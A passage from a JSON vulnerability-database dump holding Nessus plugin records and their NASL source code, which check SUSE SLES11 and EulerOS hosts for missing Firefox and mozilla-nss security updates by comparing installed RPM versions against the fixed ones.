audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libsoftokn3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-45.5.1esr-59.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"MozillaFirefox-translations-45.5.1esr-59.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libfreebl3-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libsoftokn3-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mozilla-nss-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"mozilla-nss-tools-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"libsoftokn3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"libsoftokn3-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-45.5.1esr-59.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"MozillaFirefox-translations-45.5.1esr-59.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libfreebl3-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"libsoftokn3-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mozilla-nss-3.21.3-39.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"mozilla-nss-tools-3.21.3-39.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / mozilla-nss\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:39:02", "description": "This update for MozillaFirefox, mozilla-nss fixes security issues and bugs. The following vulnerabilities were fixed in Firefox ESR 45.5.1 (bsc#1009026) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation (bsc#1012964 MFSA 2016-92)\n\n - CVE-2016-5297: Incorrect argument length checking in JavaScript (bsc#1010401)\n\n - CVE-2016-9066: Integer overflow leading to a buffer overflow in nsScriptLoadHandler (bsc#1010404)\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in rasterize_edges_1 (bsc#1010395)\n\n - CVE-2016-9064: Addons update must verify IDs match between current and new versions (bsc#1010402)\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50 and Firefox ESR 45.5 (bsc#1010427)\n\n - CVE-2016-5291: Same-origin policy violation using local HTML file and saved shortcut file (bsc#1010410) The following vulnerabilities were fixed in mozilla-nss 3.21.3 :\n\n - CVE-2016-9074: Insufficient timing side-channel resistance in divSpoiler (bsc#1010422)\n\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey / ssl3_ComputeRecordMACConstantTime causes server crash (bsc#1010517) The following bugs were fixed :\n\n - Firefox would fail to go into fullscreen mode with some window managers (bsc#992549)\n\n - font warning messages would flood console, now using fontconfig configuration from firefox-fontconfig instead of the system one (bsc#1000751)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-12-14T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2016:3105-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5285", "CVE-2016-5290", "CVE-2016-5291", "CVE-2016-5296", "CVE-2016-5297", "CVE-2016-9064", "CVE-2016-9066", "CVE-2016-9074", "CVE-2016-9079"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:MozillaFirefox", "p-cpe:/a:novell:suse_linux:MozillaFirefox-translations", "p-cpe:/a:novell:suse_linux:libfreebl3", "p-cpe:/a:novell:suse_linux:mozilla-nss", "p-cpe:/a:novell:suse_linux:mozilla-nss-devel", "p-cpe:/a:novell:suse_linux:mozilla-nss-tools", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-3105-1.NASL", "href": "https://www.tenable.com/plugins/nessus/95797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:3105-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95797);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5285\", \"CVE-2016-5290\", \"CVE-2016-5291\", \"CVE-2016-5296\", \"CVE-2016-5297\", \"CVE-2016-9064\", \"CVE-2016-9066\", \"CVE-2016-9074\", \"CVE-2016-9079\");\n\n script_name(english:\"SUSE SLES11 Security Update : MozillaFirefox, mozilla-nss (SUSE-SU-2016:3105-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for MozillaFirefox, mozilla-nss fixes security issues and\nbugs. The following vulnerabilities were fixed in Firefox ESR 45.5.1\n(bsc#1009026) :\n\n - CVE-2016-9079: Use-after-free in SVG Animation\n (bsc#1012964 MFSA 2016-92)\n\n - CVE-2016-5297: Incorrect argument length checking in\n JavaScript (bsc#1010401)\n\n - CVE-2016-9066: Integer overflow leading to a buffer\n overflow in nsScriptLoadHandler (bsc#1010404)\n\n - CVE-2016-5296: Heap-buffer-overflow WRITE in\n rasterize_edges_1 (bsc#1010395)\n\n - CVE-2016-9064: Addons update must verify IDs match\n between current and new versions (bsc#1010402)\n\n - CVE-2016-5290: Memory safety bugs fixed in Firefox 50\n and Firefox ESR 45.5 (bsc#1010427)\n\n - CVE-2016-5291: Same-origin policy violation using local\n HTML file and saved shortcut file (bsc#1010410) The\n following vulnerabilities were fixed in mozilla-nss\n 3.21.3 :\n\n - CVE-2016-9074: Insufficient timing side-channel\n resistance in divSpoiler (bsc#1010422)\n\n - CVE-2016-5285: Missing NULL check in PK11_SignWithSymKey\n / ssl3_ComputeRecordMACConstantTime causes server crash\n (bsc#1010517) The following bugs were fixed :\n\n - Firefox would fail to go into fullscreen mode with some\n window managers (bsc#992549)\n\n - font warning messages would flood console, now using\n fontconfig configuration from firefox-fontconfig instead\n of the system one (bsc#1000751)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1009026\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010401\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010402\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010427\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1010517\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1012964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=992549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5285/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5290/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5291/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5296/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5297/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9064/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9066/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9074/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-9079/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20163105-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1593bc97\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-mfs2016-90-12883=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-mfs2016-90-12883=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libfreebl3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mozilla-nss-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"libfreebl3-32bit-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"mozilla-nss-32bit-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"libfreebl3-32bit-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"mozilla-nss-32bit-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"MozillaFirefox-45.5.1esr-63.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"MozillaFirefox-translations-45.5.1esr-63.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"libfreebl3-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-devel-3.21.3-30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"mozilla-nss-tools-3.21.3-30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MozillaFirefox / mozilla-nss\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T14:51:38", "description": "According to the versions of the firefox package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox. (CVE-2016-9079,CVE-2016-9893, CVE-2016-9899, CVE-2016-9895, CVE-2016-9897, CVE-2016-9898, CVE-2016-9900, CVE-2016-9901, CVE-2016-9902, CVE-2016-9904, CVE-2016-9905,CVE-2017-5373,CVE-2017-5375,CVE-2017-5376 ,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-538 6,CVE-2017-5390,CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : firefox (EulerOS-SA-2017-1012)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079", "CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904", "CVE-2016-9905", "CVE-2017-5373", "CVE-2017-5375", "CVE-2017-5376", "CVE-2017-5378", "CVE-2017-5380", "CVE-2017-5383", "CVE-2017-5386", "CVE-2017-5390", "CVE-2017-5396"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:firefox", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1012.NASL", "href": "https://www.tenable.com/plugins/nessus/99858", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99858);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-9079\",\n \"CVE-2016-9893\",\n \"CVE-2016-9895\",\n \"CVE-2016-9897\",\n \"CVE-2016-9898\",\n \"CVE-2016-9899\",\n \"CVE-2016-9900\",\n \"CVE-2016-9901\",\n \"CVE-2016-9902\",\n \"CVE-2016-9904\",\n \"CVE-2016-9905\",\n \"CVE-2017-5373\",\n \"CVE-2017-5375\",\n \"CVE-2017-5376\",\n \"CVE-2017-5378\",\n \"CVE-2017-5380\",\n \"CVE-2017-5383\",\n \"CVE-2017-5386\",\n \"CVE-2017-5390\",\n \"CVE-2017-5396\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : firefox (EulerOS-SA-2017-1012)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the firefox package installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Multiple flaws were found in the processing of\n malformed web content. A web page containing malicious\n content could cause Firefox to crash or, potentially,\n execute arbitrary code with the privileges of the user\n running Firefox. (CVE-2016-9079,CVE-2016-9893,\n CVE-2016-9899, CVE-2016-9895, CVE-2016-9897,\n CVE-2016-9898, CVE-2016-9900, CVE-2016-9901,\n CVE-2016-9902, CVE-2016-9904,\n CVE-2016-9905,CVE-2017-5373,CVE-2017-5375,CVE-2017-5376\n ,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-538\n 6,CVE-2017-5390,CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1012\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2639f2c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected firefox packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox nsSMILTimeContainer::NotifyTimeChange() RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"firefox-45.7.0-1.0.1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg, allowmaj:TRUE)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T14:52:15", "description": "According to the versions of the firefox package installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Firefox to crash or, potentially, execute arbitrary code with the privileges of the user running Firefox.\n (CVE-2016-9079,CVE-2016-9893,CVE-2016-9895,CVE-2016-989 7,CVE-2016-9898,CVE-2016-9899,CVE-2016-9900,CVE-2016-99 01,CVE-2016-9902,CVE-2016-9904,CVE-2016-9905,CVE-2017-5 373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378, CVE-2017-5380, CVE-2017-5383, CVE-2017-5386, CVE-2017-5390, CVE-2017-5396)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : firefox (EulerOS-SA-2017-1011)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9079", "CVE-2016-9893", "CVE-2016-9895", "CVE-2016-9897", "CVE-2016-9898", "CVE-2016-9899", "CVE-2016-9900", "CVE-2016-9901", "CVE-2016-9902", "CVE-2016-9904", "CVE-2016-9905", "CVE-2017-5373", "CVE-2017-5375", "CVE-2017-5376", "CVE-2017-5378", "CVE-2017-5380", "CVE-2017-5383", "CVE-2017-5386", 